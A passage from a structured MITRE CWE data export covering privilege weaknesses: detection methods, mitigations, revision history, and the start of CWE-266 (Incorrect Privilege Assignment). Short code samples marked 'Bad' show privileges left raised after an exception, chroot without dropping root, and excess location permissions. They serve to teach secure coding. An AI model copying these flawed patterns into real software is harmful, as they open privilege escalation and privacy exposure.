"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2013-07-17",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2014-02-18",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Modes_of_Introduction, References, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2018-03-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Taxonomy_Mappings",
"ModificationDate": "2019-01-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2019-09-19",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Detection_Factors, Observed_Examples, References, Relationships, Type",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Maintenance_Notes, Taxonomy_Mappings",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "Suggested mappings to ISA/IEC 62443.",
"ContributionDate": "2023-01-24",
"ContributionName": "\"Mapping CWE to 62443\" Sub-Working Group",
"ContributionOrganization": "CWE-CAPEC ICS/OT SIG",
"ContributionReleaseDate": "2023-01-31",
"ContributionType": "Content",
"ContributionVersion": "4.10",
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "Suggested mappings to ISA/IEC 62443.",
"ContributionDate": "2023-04-25",
"ContributionName": "\"Mapping CWE to 62443\" Sub-Working Group",
"ContributionOrganization": "CWE-CAPEC ICS/OT SIG",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-01-30",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Often Misused: Privilege Management",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-01-12",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Design Principle Violation: Failure to Use Least Privilege",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "269",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "657",
"Nature": "ChildOf",
"Ordinal": null,
"ViewID": "1000"
}
] | null |
[
{
"Description": "This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.",
"DetectionMethodID": null,
"Effectiveness": null,
"EffectivenessNotes": "These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules.",
"Method": "Manual Analysis"
},
{
"Description": "\n\nUse monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.\n\n\nAttach the monitor to the process and perform a login. Look for library functions and system calls that indicate when privileges are being raised or dropped. Look for accesses of resources that are restricted to normal users.\n",
"DetectionMethodID": "DM-11.7",
"Effectiveness": null,
"EffectivenessNotes": "Note that this technique is only useful for privilege issues related to system resources. It is not likely to detect application-level business rules that are related to privileges, such as if a blog system allows a user to delete a blog entry without first checking that the user has administrator privileges.",
"Method": "Black Box"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tHighly cost effective:\n```\n\n\t\tCompare binary / bytecode to application permission manifest\n\t```\n\t\tCost effective for partial coverage:\n```\n\n\t\tBytecode Weakness Analysis - including disassembler + source code weakness analysis\n\t\tBinary Weakness Analysis - including disassembler + source code weakness analysis",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis - Binary or Bytecode"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tBinary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Manual Static Analysis - Binary or Bytecode"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tHost-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Automated Results Interpretation"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tHost Application Interface Scanner",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Manual Results Interpretation"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tHighly cost effective:\n```\n\n\t\tManual Source Code Review (not inspections)\n\t```\n\t\tCost effective for partial coverage:\n```\n\n\t\tFocused Manual Spotcheck - Focused manual analysis of source",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Manual Static Analysis - Source Code"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tSource code Weakness Analyzer\n\t\tContext-configured Source Code Weakness Analyzer",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis - Source Code"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tConfiguration Checker\n\t\tPermission Manifest Analysis",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tHighly cost effective:\n```\n\n\t\tInspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)\n\t\tFormal Methods / Correct-By-Construction\n\t```\n\t\tCost effective for partial coverage:\n```\n\n\t\tAttack Modeling",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Architecture or Design Review"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This code temporarily raises the program's privileges to allow creation of a new user folder.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tdef makeNewUserDir(username):\n\t\t\tif invalidUsername(username):\n```\n#avoid CWE-22 and CWE-78* \n\t\t\t\t\tprint('Usernames cannot contain invalid characters')\n\t\t\t\t\treturn False\n\t\t\ttry:\n\t\t\t```\n\t\t\t\traisePrivileges()\n\t\t\t\tos.mkdir('/home/' + username)\n\t\t\t\tlowerPrivileges()\n\t\t\texcept OSError:\n\t\t\t\tprint('Unable to create new user directory for user:' + username)\n\t\t\t\treturn False\n\t\t\treturn True\n```",
"IntroText": null,
"Language": "Python",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "While the program only raises its privilege level to create the folder and immediately lowers it again, if the call to os.mkdir() throws an exception, the call to lowerPrivileges() will not occur. As a result, the program is indefinitely operating in a raised privilege state, possibly allowing further exploitation to occur.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-126"
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tchroot(APP_HOME);\n\tchdir(\"/\");\n\tFILE* data = fopen(argv[1], \"r+\");\n\t...\n```",
"IntroText": null,
"Language": "C",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "Constraining the process inside the application's home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This application intends to use a user's location to determine the timezone the user is in:",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tlocationClient = new LocationClient(this, this, this);\n\tlocationClient.connect();\n\tLocation userCurrLocation;\n\tuserCurrLocation = locationClient.getLastLocation();\n\tsetTimeZone(userCurrLocation);\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "This is unnecessary use of the location API, as this information is already available using the Android Time API. Always be sure there is not another way to obtain needed information before resorting to using the location API.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This code uses location to determine the user's current US State location.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application's manifest.xml:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t<uses-permission android:name=\"android.permission.ACCESS_FINE_LOCATION\"/>\n```",
"IntroText": null,
"Language": "XML",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "During execution, a call to getLastLocation() will return a location based on the application's location permissions. In this case the application has permission for the most accurate location possible:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tlocationClient = new LocationClient(this, this, this);\n\tlocationClient.connect();\n\tLocation userCurrLocation;\n\tuserCurrLocation = locationClient.getLastLocation();\n\tderiveStateFromCoords(userCurrLocation);\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-111"
}
] | null | null |
Medium
| null | 2
|
[
[
"284",
"269",
"250"
],
[
"710",
"657",
"250"
]
] |
[] |
266
|
Incorrect Privilege Assignment
|
Base
|
Simple
|
Draft
|
A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": "A user can access restricted functionality and/or sensitive information that may include administrative functionality and user accounts.",
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-1",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": null
},
{
"Description": "Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-17",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": "Environment Hardening"
}
] |
[
{
"Description": "untrusted user placed in unix \"wheel\" group",
"Link": "https://www.cve.org/CVERecord?id=CVE-1999-1193",
"Reference": "CVE-1999-1193"
},
{
"Description": "Product allows users to grant themselves certain rights that can be used to escalate privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-2741",
"Reference": "CVE-2005-2741"
},
{
"Description": "Product uses group ID of a user instead of the group, causing it to run with different privileges. This is resultant from some other unknown issue.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-2496",
"Reference": "CVE-2005-2496"
},
{
"Description": "Product mistakenly assigns a particular status to an entity, leading to increased privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2004-0274",
"Reference": "CVE-2004-0274"
}
] |
[
"System Process"
] |
[
{
"EntryID": null,
"EntryName": "Incorrect Privilege Assignment",
"MappingFit": null,
"TaxonomyName": "PLOVER"
},
{
"EntryID": "SEC00-J",
"EntryName": "Do not allow privileged blocks to leak sensitive information across a trust boundary",
"MappingFit": null,
"TaxonomyName": "The CERT Oracle Secure Coding Standard for Java (2011)"
},
{
"EntryID": "SEC01-J",
"EntryName": "Do not allow tainted variables in privileged blocks",
"MappingFit": null,
"TaxonomyName": "The CERT Oracle Secure Coding Standard for Java (2011)"
}
] | null |
[
{
"Authors": [
"Sean Barnum",
"Michael Gegick"
],
"Edition": null,
"ExternalReferenceID": "REF-76",
"Publication": null,
"PublicationDay": "14",
"PublicationMonth": "09",
"PublicationYear": "2005",
"Publisher": null,
"Section": null,
"Title": "Least Privilege",
"URL": "https://web.archive.org/web/20211209014121/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/least-privilege",
"URLDate": "2023-04-07"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships, Taxonomy_Mappings",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, References",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Demonstrative_Examples",
"ModificationDate": "2014-02-18",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
